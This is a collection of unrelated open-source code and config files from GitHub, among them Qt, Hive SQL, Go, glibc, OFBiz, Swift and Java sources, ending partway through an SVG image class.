0; }
{ "pile_set_name": "Github" }
TARGET = com_trolltech_qt_sql include(../qtjambi/qtjambi_include.pri) include($$QTJAMBI_CPP/com_trolltech_qt_sql/com_trolltech_qt_sql.pri) # libQtSql.so.4.7.4 is only dependant on libQtCore.so.4 (ensures removal of 'Qt -= gui') QT = core sql
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE ldml SYSTEM "../../common/dtd/ldml.dtd"> <ldml> <identity> <version number="$Revision: 4126 $"/> <generation date="$Date: 2009-05-05 18:33:13 -0500 (Tue, 05 May 2009) $"/> <language type="ka"/> </identity> <rbnf> <rulesetGrouping type="SpelloutRules"> <ruleset type="spellout-numbering-year"> <rbnfrule value="x.x">=#,###0.#=;</rbnfrule> <rbnfrule value="0">=%spellout-numbering=;</rbnfrule> </ruleset> <ruleset type="spellout-numbering"> <rbnfrule value="0">=%spellout-cardinal=;</rbnfrule> </ruleset> <ruleset type="spellout-cardinal"> <rbnfrule value="-x">მინუს →→;</rbnfrule> <rbnfrule value="x.x">←← მძიმე →→;</rbnfrule> <rbnfrule value="0">ნული;</rbnfrule> <rbnfrule value="1">ერთი;</rbnfrule> <rbnfrule value="2">ორი;</rbnfrule> <rbnfrule value="3">სამი;</rbnfrule> <rbnfrule value="4">ოთხი;</rbnfrule> <rbnfrule value="5">ხუთი;</rbnfrule> <rbnfrule value="6">ექვსი;</rbnfrule> <rbnfrule value="7">შვიდი;</rbnfrule> <rbnfrule value="8">რვა;</rbnfrule> <rbnfrule value="9">ცხრა;</rbnfrule> <rbnfrule value="10">ათი;</rbnfrule> <rbnfrule value="11">თერთმეტი;</rbnfrule> <rbnfrule value="12">თორმეტი;</rbnfrule> <rbnfrule value="13">ცამეტი;</rbnfrule> <rbnfrule value="14">თოთხმეტი;</rbnfrule> <rbnfrule value="15">თხუთმეტი;</rbnfrule> <rbnfrule value="16">თექვსმეტი;</rbnfrule> <rbnfrule value="17">ჩვიდმეტი;</rbnfrule> <rbnfrule value="18">თრვამეტი;</rbnfrule> <rbnfrule value="19">ცხრამეტი;</rbnfrule> <rbnfrule value="20" radix="20">ოცი;</rbnfrule> <rbnfrule value="21" radix="20">ოცდა­→→;</rbnfrule> <rbnfrule value="40" radix="20">ორმოცი;</rbnfrule> <rbnfrule value="41" radix="20">ორმოცდა­→→;</rbnfrule> <rbnfrule value="60" radix="20">სამოცი;</rbnfrule> <rbnfrule value="61" radix="20">სამოცდა­→→;</rbnfrule> <rbnfrule value="80" radix="20">ოთხმოცი;</rbnfrule> <rbnfrule value="81" radix="20">ოთხმოცდა­→→;</rbnfrule> <rbnfrule value="100">ას→%%hundred→;</rbnfrule> <rbnfrule value="200">ორას→%%hundred→;</rbnfrule> <rbnfrule value="300">სამას→%%hundred→;</rbnfrule> <rbnfrule value="400">ოთხას→%%hundred→;</rbnfrule> <rbnfrule value="500">ხუთას→%%hundred→;</rbnfrule> <rbnfrule value="600">ექვსას→%%hundred→;</rbnfrule> <rbnfrule value="700">შვიდას→%%hundred→;</rbnfrule> <rbnfrule value="800">რვაას→%%hundred→;</rbnfrule> <rbnfrule value="900">ცხრაას→%%hundred→;</rbnfrule> <rbnfrule value="1000">ათას→%%th→;</rbnfrule> <rbnfrule value="2000">←← ათას→%%th→;</rbnfrule> <rbnfrule value="1000000">←← მილიონ→%%th→;</rbnfrule> <rbnfrule value="1000000000">←← მილიარდ→%%th→;</rbnfrule> <rbnfrule value="1000000000000">←← ბილიონ→%%th→;</rbnfrule> <rbnfrule value="1000000000000000">←← ბილიარდ→%%th→;</rbnfrule> <rbnfrule value="1000000000000000000">=#,##0=;</rbnfrule> </ruleset> <ruleset type="hundred" access="private"> <rbnfrule value="0">ი;</rbnfrule> <rbnfrule value="1">­=%spellout-cardinal=;</rbnfrule> </ruleset> <ruleset type="th" access="private"> <rbnfrule value="0">ი;</rbnfrule> <rbnfrule value="1">' =%spellout-cardinal=;</rbnfrule> </ruleset> </rulesetGrouping> </rbnf> </ldml>
{ "pile_set_name": "Github" }
CREATE TABLE dimension_date ( id int, dateid int, completedate string, daynumberinweek tinyint, dayfullname string, daynumberinmonth tinyint, daynumberinyear int, weeknumberinyear tinyint, monthnumberinyear tinyint, monthfullname string, quarternumber tinyint, quartername string, yearnumber int, weekstartdate string, weekstartdateid int, monthstartdate string, monthstartdateid int); explain with daily as ( select * from dimension_date where dateid = 20200228 ), weekly as ( select dly.dateid,count(1) as mb_wk from dimension_date dly left join dimension_date wk ON datediff(dly.completedate, wk.completedate) >= 0 AND datediff(dly.completedate, wk.completedate) < 6 GROUP BY dly.dateid ), monthly as ( select dly.dateid,count(1) as nb_monthly from dimension_date dly left join dimension_date wk ON datediff(dly.completedate, wk.completedate) >= 0 AND datediff(dly.completedate, wk.completedate) < 28 GROUP BY dly.dateid ) select daily.dateid,mb_wk,nb_monthly from daily left join weekly on daily.dateid = weekly.dateid left join monthly on daily.dateid = monthly.dateid;
{ "pile_set_name": "Github" }
package com.bage.controller; public interface BookRepository { Book getByIsbn(String isbn); }
{ "pile_set_name": "Github" }
<html> <!-- The contents of this file are sent for error pages. {{CODE}} is replaced with a number. --> <body style="margin: 40px 80px; font-family: 'Arial Black', 'Arial Bold', Gadget, sans-serif; background: #333; color: #ddd;"> <h1 style="margin-bottom: 0px;"> {{HOSTNAME}} </h1> <small style="padding-top: 0px;"> We'll be back shortly. Check again in about 10 minutes. </small> </body>
{ "pile_set_name": "Github" }
/* * Generated by class-dump 3.3.4 (64 bit). * * class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2011 by Steve Nygard. */ #import <CallHistory/CHLogger.h> #import "SyncManagerProtocol-Protocol.h" @class DBHandleManager, NSString, TransactionManager; @interface SyncManager : CHLogger <SyncManagerProtocol> { TransactionManager *_transactionManager; DBHandleManager *_handleManager; } @property(readonly, nonatomic) DBHandleManager *handleManager; // @synthesize handleManager=_handleManager; - (void).cxx_destruct; - (id)archiveCallObject:(id)arg1; - (void)resetTimers; - (double)timerOutgoing; - (double)timerIncoming; - (double)timerLifetime; - (void)addUpdateTransactions:(id)arg1; - (void)updateAllObjects:(id)arg1; - (void)updateObjects:(id)arg1; - (void)deleteObjectsWithLimits:(id)arg1; - (void)deleteAllObjects; - (void)deleteObjectsWithUniqueIds:(id)arg1; - (void)deleteObjectWithUniqueId:(id)arg1; - (id)fetchObjectsWithLimits:(id)arg1; - (id)fetchObjectWithUniqueId:(id)arg1; - (id)fetchAllObjects; - (void)insertWithoutTransaction:(id)arg1; - (void)insert:(id)arg1; - (id)init; // Remaining properties @property(readonly, copy) NSString *debugDescription; @property(readonly, copy) NSString *description; @property(readonly) unsigned long long hash; @property(readonly) Class superclass; @end
{ "pile_set_name": "Github" }
aui-search ========
{ "pile_set_name": "Github" }
; BrushTexture Example ; -------------------- Graphics3D 640,480 SetBuffer BackBuffer() camera=CreateCamera() light=CreateLight() RotateEntity light,90,0,0 cube=CreateCube() PositionEntity cube,0,0,5 ; Load texture tex=LoadTexture( "media/b3dlogo.jpg" ) ; Create brush brush=CreateBrush() ; Apply texture to brush BrushTexture brush,tex ; Paint mesh with brush PaintMesh cube,brush While Not KeyDown( 1 ) pitch#=0 yaw#=0 roll#=0 If KeyDown( 208 )=True Then pitch#=-1 If KeyDown( 200 )=True Then pitch#=1 If KeyDown( 203 )=True Then yaw#=-1 If KeyDown( 205 )=True Then yaw#=1 If KeyDown( 45 )=True Then roll#=-1 If KeyDown( 44 )=True Then roll#=1 TurnEntity cube,pitch#,yaw#,roll# RenderWorld Flip Wend End
{ "pile_set_name": "Github" }
package problem0887 func superEggDrop(K, N int) int { moves := 0 dp := [101]int{} // 1 <= K <= 100 // dp[i] = n 表示, i 个鸡蛋,利用 moves 次移动,最多可以检测 n 层楼 for dp[K] < N { for i := K; i > 0; i-- { dp[i] += dp[i-1] + 1 // 以上计算式,是从以下转移方程简化而来 // dp[moves][k] = 1 + dp[moves-1][k-1] + dp[moves-1][k] // 假设 dp[moves-1][k-1] = n0, dp[moves-1][k] = n1 // 首先检测,从第 n0+1 楼丢下鸡蛋会不会破。 // 如果鸡蛋破了,F 一定是在 [1:n0] 楼中, // 利用剩下的 moves-1 次机会和 k-1 个鸡蛋,可以把 F 找出来。 // 如果鸡蛋没破,假如 F 在 [n0+2:n0+n1+1] 楼中 // 利用剩下的 moves-1 次机会和 k 个鸡蛋把,也可以把 F 找出来。 // 所以,当有 moves 个放置机会和 k 个鸡蛋的时候 // F 在 [1, n0+n1+1] 中的任何一楼,都能够被检测出来。 } moves++ } return moves }
{ "pile_set_name": "Github" }
/** * Module exports. */ module.exports = on; /** * Helper for subscriptions. * * @param {Object|EventEmitter} obj with `Emitter` mixin or `EventEmitter` * @param {String} event name * @param {Function} callback * @api public */ function on (obj, ev, fn) { obj.on(ev, fn); return { destroy: function () { obj.removeListener(ev, fn); } }; }
{ "pile_set_name": "Github" }
/* Copyright (C) 2015-2018 Free Software Foundation, Inc. This file is part of the GNU C Library. The GNU C Library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. The GNU C Library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with the GNU C Library; if not, see <http://www.gnu.org/licenses/>. */ #include <bits/wordsize.h> #include <kernel-features.h> /* Set error number and return -1. A target may choose to return the internal function, __syscall_error, which sets errno and returns -1. We use -1l, instead of -1, so that it can be casted to (void *). */ #define INLINE_SYSCALL_ERROR_RETURN_VALUE(err) \ ({ \ __set_errno (err); \ -1l; \ }) /* Provide a dummy argument that can be used to force register alignment for register pairs if required by the syscall ABI. */ #ifdef __ASSUME_ALIGNED_REGISTER_PAIRS #define __ALIGNMENT_ARG 0, #define __ALIGNMENT_COUNT(a,b) b #else #define __ALIGNMENT_ARG #define __ALIGNMENT_COUNT(a,b) a #endif /* Provide a common macro to pass 64-bit value on syscalls. */ #if __WORDSIZE == 64 || defined __ASSUME_WORDSIZE64_ILP32 # define SYSCALL_LL(val) (val) # define SYSCALL_LL64(val) (val) #else #define SYSCALL_LL(val) \ __LONG_LONG_PAIR ((val) >> 31, (val)) #define SYSCALL_LL64(val) \ __LONG_LONG_PAIR ((long) ((val) >> 32), (long) ((val) & 0xffffffff)) #endif /* Provide a common macro to pass 64-bit value on pread and pwrite syscalls. */ #ifdef __ASSUME_PRW_DUMMY_ARG # define SYSCALL_LL_PRW(val) 0, SYSCALL_LL (val) # define SYSCALL_LL64_PRW(val) 0, SYSCALL_LL64 (val) #else # define SYSCALL_LL_PRW(val) __ALIGNMENT_ARG SYSCALL_LL (val) # define SYSCALL_LL64_PRW(val) __ALIGNMENT_ARG SYSCALL_LL64 (val) #endif /* Provide a macro to pass the off{64}_t argument on p{readv,writev}{64}. */ #define LO_HI_LONG(val) \ (long) (val), \ (long) (((uint64_t) (val)) >> 32) /* Exports the __send symbol on send.c linux implementation (some ABI have it missing due the usage of a old generic version without it). */ #define HAVE_INTERNAL_SEND_SYMBOL 1
{ "pile_set_name": "Github" }
# Teena: UNIX in Python Teena aims to be a collection of ports of UNIX and Linux syscalls to pure Python, with an emphasis on performance and correctness. Windows support is not a primary concern—I’m initially targeting only POSIX-compliant operating systems. The library uses [Tornado][] to do efficient asynchronous I/O. [tornado]: http://www.tornadoweb.org/ The first version of this library will contain implementations of `tee` and `splice` which operate on files, sockets, and file descriptors. There’s also a `Capture` class which behaves like `StringIO`, but it has a `fileno()` and so can be used where a real file descriptor is needed. ## Example I’ll demonstrate how to capture the result of an HTTP request, whilst efficiently streaming the response to `stderr`. Do the necessary imports: ```pycon >>> from contextlib import closing >>> import teena >>> import os >>> import sys >>> import urllib2 ``` Create a `teena.Capture()` object to capture the output: ```pycon >>> capture = teena.Capture() ``` Open a connection using `urllib2.urlopen()`. This connection object has an associated file descriptor, so you can pass it directly into `tee()`: ```pycon >>> with closing(urllib2.urlopen('http://whatthecommit.com/index.txt')) as conn: ... teena.tee(conn, (sys.stderr, capture.input)) This really should not take 19 minutes to build. >>> print repr(capture.getvalue()) 'This really should not take 19 minutes to build.\n' ``` ## Installation pip install teena ## License Copyright (C) 2012 Zachary Voase Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
{ "pile_set_name": "Github" }
Manifest-Version: 1.0 Bundle-ManifestVersion: 2 Bundle-Name: %pluginName Bundle-SymbolicName: org.locationtech.udig.ui; singleton:=true Bundle-Version: 2.3.0.qualifier Bundle-Activator: org.locationtech.udig.internal.ui.UiPlugin Bundle-Vendor: udig.refractions.net Bundle-Localization: plugin Eclipse-ExtensibleAPI: true Eclipse-BuddyPolicy: ext Require-Bundle: org.eclipse.ui;visibility:=reexport, org.eclipse.core.runtime, org.locationtech.udig.libs;visibility:=reexport, org.locationtech.udig.core;visibility:=reexport, org.eclipse.core.expressions;visibility:=reexport Bundle-ActivationPolicy: lazy Export-Package: org.locationtech.udig, org.locationtech.udig.aoi, org.locationtech.udig.internal.aoi;x-friends:="org.locationtech.udig.ui.tests,org.locationtech.udig.project.ui.tests", org.locationtech.udig.internal.ui;x-internal:=true, org.locationtech.udig.internal.ui.operations;x-internal:=true, org.locationtech.udig.ui, org.locationtech.udig.ui.action, org.locationtech.udig.ui.aoi, org.locationtech.udig.ui.export, org.locationtech.udig.ui.filter, org.locationtech.udig.ui.graphics, org.locationtech.udig.ui.internal;x-internal:=true, org.locationtech.udig.ui.operations, org.locationtech.udig.ui.palette, org.locationtech.udig.ui.preferences, org.locationtech.udig.ui.properties Import-Package: com.google.common.base;version="12.0.0", net.miginfocom.swt;version="[3.7.0,3.8.0)"
{ "pile_set_name": "Github" }
<#-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <#assign docLangAttr = locale.toString()?replace("_", "-")> <#assign initialLocale = locale.toString()> <#assign langDir = "ltr"> <#if "ar.iw"?contains(docLangAttr?substring(0, 2))> <#assign langDir = "rtl"> </#if> <html lang="${docLangAttr}" dir="${langDir}" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>${title!}</title> <#if layoutSettings.shortcutIcon?has_content> <#assign shortcutIcon = layoutSettings.shortcutIcon/> <#elseif layoutSettings.VT_SHORTCUT_ICON?has_content> <#assign shortcutIcon = layoutSettings.VT_SHORTCUT_ICON /> </#if> <#if shortcutIcon?has_content> <link rel="shortcut icon" href="<@ofbizContentUrl>${StringUtil.wrapString(shortcutIcon)+".ico"}</@ofbizContentUrl>" type="image/x-icon"> <link rel="icon" href="<@ofbizContentUrl>${StringUtil.wrapString(shortcutIcon)+".png"}</@ofbizContentUrl>" type="image/png"> <link rel="icon" sizes="32x32" href="<@ofbizContentUrl>${StringUtil.wrapString(shortcutIcon)+"-32.png"}</@ofbizContentUrl>" type="image/png"> <link rel="icon" sizes="64x64" href="<@ofbizContentUrl>${StringUtil.wrapString(shortcutIcon)+"-64.png"}</@ofbizContentUrl>" type="image/png"> <link rel="icon" sizes="96x96" href="<@ofbizContentUrl>${StringUtil.wrapString(shortcutIcon)+"-96.png"}</@ofbizContentUrl>" type="image/png"> </#if> <#if layoutSettings.javaScripts?has_content> <#--layoutSettings.javaScripts is a list of java scripts. --> <#-- use a Set to make sure each javascript is declared only once, but iterate the list to maintain the correct order --> <#assign javaScriptsSet = Static["org.apache.ofbiz.base.util.UtilMisc"].toSet(layoutSettings.javaScripts)/> <#list layoutSettings.javaScripts as javaScript> <#if javaScriptsSet.contains(javaScript)> <#assign nothing = javaScriptsSet.remove(javaScript)/> <script src="<@ofbizContentUrl>${StringUtil.wrapString(javaScript)}</@ofbizContentUrl>" type="application/javascript"></script> </#if> </#list> </#if> <#if layoutSettings.styleSheets?has_content> <#list layoutSettings.styleSheets as styleSheet> <link rel="stylesheet" href="<@ofbizContentUrl>${styleSheet}</@ofbizContentUrl>" type="text/css"/> </#list> </#if> <#if layoutSettings.VT_STYLESHEET?has_content> <#list layoutSettings.VT_STYLESHEET as styleSheet> <link rel="stylesheet" href="<@ofbizContentUrl>${styleSheet}</@ofbizContentUrl>" type="text/css"/> </#list> </#if> <#if layoutSettings.VT_HELPSTYLESHEET?has_content && lookupType?has_content> <#list layoutSettings.VT_HELPSTYLESHEET as styleSheet> <link rel="stylesheet" href="<@ofbizContentUrl>${styleSheet}</@ofbizContentUrl>" type="text/css"/> </#list> </#if> <#if layoutSettings.rtlStyleSheets?has_content && "rtl" == langDir> <#list layoutSettings.rtlStyleSheets as styleSheet> <link rel="stylesheet" href="<@ofbizContentUrl>${styleSheet}</@ofbizContentUrl>" type="text/css"/> </#list> </#if> <#if layoutSettings.VT_RTL_STYLESHEET?has_content && "rtl" == langDir> <#list layoutSettings.VT_RTL_STYLESHEET as styleSheet> <link rel="stylesheet" href="<@ofbizContentUrl>${styleSheet}</@ofbizContentUrl>" type="text/css"/> </#list> </#if> <script type="application/javascript"> // This code inserts the value lookedup by a popup window back into the associated form element var re_id = new RegExp('id=(\\d+)'); var num_id = (re_id.exec(String(window.location)) ? new Number(RegExp.$1) : 0); var obj_caller = (window.opener ? window.opener.lookups[num_id] : null); if (obj_caller == null) obj_caller = window.opener; // function passing selected value to calling window function set_multivalues(value) { obj_caller.target.value = value; var thisForm = obj_caller.target.form; var evalString = ""; if (arguments.length > 2) { for (var i = 1; i < arguments.length; i = i + 2) { evalString = "setSourceColor(thisForm." + arguments[i] + ")"; eval(evalString); evalString = "thisForm." + arguments[i] + ".value='" + arguments[i + 1] + "'"; eval(evalString); } } window.close(); } </script> </head> <body style="background-color: WHITE;">
{ "pile_set_name": "Github" }
oro: checkout: open_order: plural_label: Open Orders billing_address.label: Billing Address shipping_address.label: Shipping Address
{ "pile_set_name": "Github" }
import Foundation import RxSwift import Keys class AdminCardTestingViewController: UIViewController { lazy var keys = EidolonKeys() var cardHandler: CardHandler! @IBOutlet weak var logTextView: UITextView! override func viewDidLoad() { super.viewDidLoad() self.logTextView.text = "" if AppSetup.sharedState.useStaging { cardHandler = CardHandler(apiKey: self.keys.cardflightStagingAPIClientKey, accountToken: self.keys.cardflightStagingMerchantAccountToken) } else { cardHandler = CardHandler(apiKey: self.keys.cardflightProductionAPIClientKey, accountToken: self.keys.cardflightProductionMerchantAccountToken) } cardHandler.cardStatus .subscribe { (event) in switch event { case .next(let message): self.log("\(message)") case .error(let error): self.log("\n====Error====\n\(error)\nThe card reader may have become disconnected.\n\n") if self.cardHandler.card != nil { self.log("==\n\(self.cardHandler.card!)\n\n") } case .completed: guard let card = self.cardHandler.card else { // Restarts the card reader self.cardHandler.startSearching() return } let cardDetails = "Card: \(card.cardInfo.cardholderName ?? "") - \(card.cardInfo.lastFour ?? "") \n \(card.token)" self.log(cardDetails) } } .disposed(by: rx.disposeBag) } override func viewWillDisappear(_ animated: Bool) { super.viewWillDisappear(animated) cardHandler.end() } override func viewDidAppear(_ animated: Bool) { super.viewDidAppear(animated) cardHandler.startSearching() } func log(_ string: String) { self.logTextView.text = "\(self.logTextView.text ?? "")\n\(string)" } @IBAction func backTapped(_ sender: AnyObject) { _ = navigationController?.popViewController(animated: true) } }
{ "pile_set_name": "Github" }
/* * Typelib for pstorec * * Copyright 2009 Alexandre Julliard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA */ #pragma makedep regtypelib #include "pstore.idl"
{ "pile_set_name": "Github" }
package arrow.meta.quotes.scope.plugins import arrow.meta.CliPlugin import arrow.meta.Meta import arrow.meta.invoke import arrow.meta.phases.CompilerContext import arrow.meta.quotes.Transform import arrow.meta.quotes.returnExpression open class ReturnExpressionPlugin : Meta { override fun intercept(ctx: CompilerContext): List<CliPlugin> = listOf( returnExpressionPlugin ) } val Meta.returnExpressionPlugin: CliPlugin get() = "Return Expression Scope Plugin" { meta( returnExpression(this, { true }) { expression -> Transform.replace( replacing = expression, newDeclaration = identity() ) } ) }
{ "pile_set_name": "Github" }
/** * Copyright (c) 2011, The University of Southampton and the individual contributors. * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * * * Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * * Neither the name of the University of Southampton nor the names of its * contributors may be used to endorse or promote products derived from this * software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package org.openimaj.image; import java.awt.geom.AffineTransform; import java.awt.image.BufferedImage; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.OutputStreamWriter; import java.util.Comparator; import org.apache.batik.svggen.SVGGraphics2DIOException; import org.apache.batik.transcoder.TranscoderException; import org.apache.batik.transcoder.TranscoderInput; import org.apache.batik.transcoder.TranscoderOutput; import org.apache.batik.transcoder.image.ImageTranscoder; import org.apache.batik.transcoder.image.PNGTranscoder; import org.openimaj.image.colour.RGBColour; import org.openimaj.image.renderer.ImageRenderer; import org.openimaj.image.renderer.RenderHints; import org.openimaj.image.renderer.SVGRenderHints; import org.openimaj.image.renderer.SVGRenderer; import org.openimaj.math.geometry.point.Point2dImpl; import org.openimaj.math.geometry.shape.Rectangle; public class SVGImage extends Image<Float[], SVGImage> { private SVGRenderer renderer; /** * @param hints */ public SVGImage(SVGRenderHints hints) { this.renderer = new SVGRenderer(null, hints); this.renderer.setImage(this); } private SVGImage() { // TODO Auto-generated constructor stub } /** * Construct an empty SVG-backed image of the given size * * @param w * the width * @param h * the height */ public SVGImage(int w, int h) { this(new SVGRenderHints(w, h)); } @Override public SVGImage abs() { return this; } @Override public SVGImage addInplace(Image<?, ?> im) { if (!(im instanceof SVGImage)) { this.renderer.drawOIImage(im); } else { this.renderer.drawImage((SVGImage) im, 0, 0); } return null; } @Override public SVGImage addInplace(Float[] num) { return this; } @Override public SVGImage clip(Float[] min, Float[] max) { return this; } @Override public SVGImage clipMax(Float[] thresh) { return this; } @Override public SVGImage clipMin(Float[] thresh) { return this; } @Override public SVGImage clone() { final SVGImage svgImage = new SVGImage(); svgImage.renderer = new SVGRenderer(svgImage, this.renderer.getGraphics2D().create()); return svgImage; } @Override public SVGRenderer createRenderer() { return this.renderer; } @Override public ImageRenderer<Float[], SVGImage> createRenderer(RenderHints options) { return this.renderer; } @Override public SVGImage divideInplace(Image<?, ?> im) { throw new UnsupportedOperationException(); } @Override public SVGImage divideInplace(Float[] val) { throw new UnsupportedOperationException(); } @Override public SVGImage extractROI(int x, int y, SVGImage img) { img.renderer = new SVGRenderer(img, img.renderer.getRenderHints(), this.renderer.getGraphics2D().create(x, y, img.getWidth(), img.getHeight())); return img; } @Override public SVGImage extractROI(int x, int y, int w, int h) { final SVGImage ret = new SVGImage(w, h); return extractROI(x, y, ret); } @Override public SVGImage extractCentreSubPix(float cx, float cy, SVGImage out) { return extractCenter((int) cx, (int) cy, out.getWidth(), out.getHeight()); } @Override public SVGImage fill(Float[] colour) { final SVGRenderHints hint = (SVGRenderHints) this.renderer.getRenderHints(); this.renderer = new SVGRenderer(hint); this.renderer.drawShapeFilled(this.getBounds(), colour); return this; } @Override public SVGImage flipX() { final AffineTransform tx = AffineTransform.getScaleInstance(-1, 1); tx.translate(this.getWidth(), 0); this.renderer.getGraphics2D().transform(tx); return this; } @Override public SVGImage flipY() { final AffineTransform tx = AffineTransform.getScaleInstance(1, -1); tx.translate(0, -this.getHeight()); this.renderer.getGraphics2D().transform(tx); return this; } @Override public Rectangle getContentArea() { return new Rectangle(0, 0, getWidth(), getHeight()); } @Override public SVGImage getField(org.openimaj.image.Image.Field f) { throw new UnsupportedOperationException(); } @Override public SVGImage getFieldCopy(org.openimaj.image.Image.Field f) { throw new UnsupportedOperationException(); } @Override public SVGImage getFieldInterpolate(org.openimaj.image.Image.Field f) { throw new UnsupportedOperationException(); } @Override public int getHeight() { return this.renderer.getGraphics2D().getSVGCanvasSize().height; } @Override public Float[] getPixel(int x, int y) { throw new UnsupportedOperationException(); } @Override public Comparator<? super Float[]> getPixelComparator() { throw new UnsupportedOperationException(); } @Override public Float[] getPixelInterp(double x, double y) { throw new UnsupportedOperationException(); } @Override public Float[] getPixelInterp(double x, double y, Float[] backgroundColour) { throw new UnsupportedOperationException(); } @Override public int getWidth() { return this.renderer.getGraphics2D().getSVGCanvasSize().width; } @Override public SVGImage internalCopy(SVGImage im) { this.renderer = im.renderer.clone(); this.renderer.setImage(this); return this; } @Override public SVGImage internalAssign(SVGImage im) { this.renderer = im.renderer; return this; } @Override public SVGImage internalAssign(int[] pixelData, int width, int height) { throw new UnsupportedOperationException(); } @Override public SVGImage inverse() { throw new UnsupportedOperationException(); } @Override public Float[] max() { throw new UnsupportedOperationException(); } @Override public Float[] min() { throw new UnsupportedOperationException(); } @Override public SVGImage multiplyInplace(Image<?, ?> im) { throw new UnsupportedOperationException(); } @Override public SVGImage multiplyInplace(Float[] num) { throw new UnsupportedOperationException(); } @Override public SVGImage newInstance(int width, int height) { return new SVGImage(width, height); } @Override public SVGImage normalise() { throw new UnsupportedOperationException(); } @Override public void setPixel(int x, int y, Float[] val) { this.renderer.drawPoint(new Point2dImpl(x, y), val, 1); } @Override public SVGImage subtractInplace(Image<?, ?> im) { throw new UnsupportedOperationException(); } @Override public SVGImage subtractInplace(Float[] num) { throw new UnsupportedOperationException(); } @Override public SVGImage threshold(Float[] thresh) { throw new UnsupportedOperationException(); } private static class BufferedImageTranscoder extends ImageTranscoder { private BufferedImage img; @Override public BufferedImage createImage(int w, int h) { final BufferedImage bi = new BufferedImage(w, h, BufferedImage.TYPE_INT_ARGB); return bi; } @Override public void writeImage(BufferedImage img, TranscoderOutput arg1) throws TranscoderException { this.img = img; } public BufferedImage getBufferedImage() { return this.img; } } @Override public byte[] toByteImage() { final MBFImage mbf = createMBFImage(); return mbf.toByteImage(); } public MBFImage createMBFImage() { final BufferedImageTranscoder t = new BufferedImageTranscoder(); t.addTranscodingHint(PNGTranscoder.KEY_WIDTH, (float) getWidth()); t.addTranscodingHint(PNGTranscoder.KEY_HEIGHT, (float) getHeight()); final ByteArrayOutputStream baos = new ByteArrayOutputStream(); try { this.renderer.write(new OutputStreamWriter(baos)); baos.flush(); baos.close(); final byte[] barr = baos.toByteArray(); final TranscoderInput input = new TranscoderInput(new ByteArrayInputStream(barr)); t.transcode(input, null); } catch (final SVGGraphics2DIOException e) { } catch (final IOException e) { } catch (final TranscoderException e) { } final MBFImage mbf = ImageUtilities.createMBFImage(t.getBufferedImage(), true); return mbf; } @Override public int[] toPackedARGBPixels() { final MBFImage mbf = createMBFImage(); return mbf.toPackedARGBPixels(); } @Override public SVGImage zero() { final SVGRenderHints hint = (SVGRenderHints) this.renderer.getRenderHints(); this.renderer = new SVGRenderer(hint); this.renderer.drawShapeFilled(this.getBounds(), RGBColour.BLACK); return this; } @Override public SVGImage overlayInplace(SVGImage image, 